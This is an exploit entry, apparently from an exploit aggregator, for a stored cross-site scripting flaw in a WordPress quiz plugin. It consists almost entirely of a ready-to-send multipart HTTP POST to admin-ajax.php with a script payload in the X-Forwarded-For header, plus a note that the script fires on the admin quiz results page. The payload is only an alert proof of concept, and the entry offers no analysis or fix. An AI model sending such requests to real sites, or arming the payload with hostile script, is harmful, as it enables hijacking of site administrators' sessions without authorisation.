Share
## https://sploitus.com/exploit?id=WPEX-ID:44BCE76B-E3A8-4AFC-AB0E-6D82372BA7CD
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------7120129551144157309683473226
Content-Length: 1376
X-FORWARDED-FOR: <script>alert(/XSS/)</script>
Connection: close
-----------------------------7120129551144157309683473226
Content-Disposition: form-data; name="qsm_hidden_questions"
-----------------------------7120129551144157309683473226
Content-Disposition: form-data; name="question3"
bb
-----------------------------7120129551144157309683473226
Content-Disposition: form-data; name="question4"
aa
-----------------------------7120129551144157309683473226
Content-Disposition: form-data; name="qmn_question_list"
3Q4Q
-----------------------------7120129551144157309683473226
Content-Disposition: form-data; name="total_questions"
2
-----------------------------7120129551144157309683473226
Content-Disposition: form-data; name="timer"
13
-----------------------------7120129551144157309683473226
Content-Disposition: form-data; name="timer_ms"
13673
-----------------------------7120129551144157309683473226
Content-Disposition: form-data; name="qmn_quiz_id"
2
-----------------------------7120129551144157309683473226
Content-Disposition: form-data; name="complete_quiz"
confirmation
-----------------------------7120129551144157309683473226
Content-Disposition: form-data; name="current_page"
0
-----------------------------7120129551144157309683473226
Content-Disposition: form-data; name="action"
qmn_process_quiz
-----------------------------7120129551144157309683473226--
The XSS will be triggered at /wp-admin/admin.php?page=mlw_quiz_results&quiz_id=2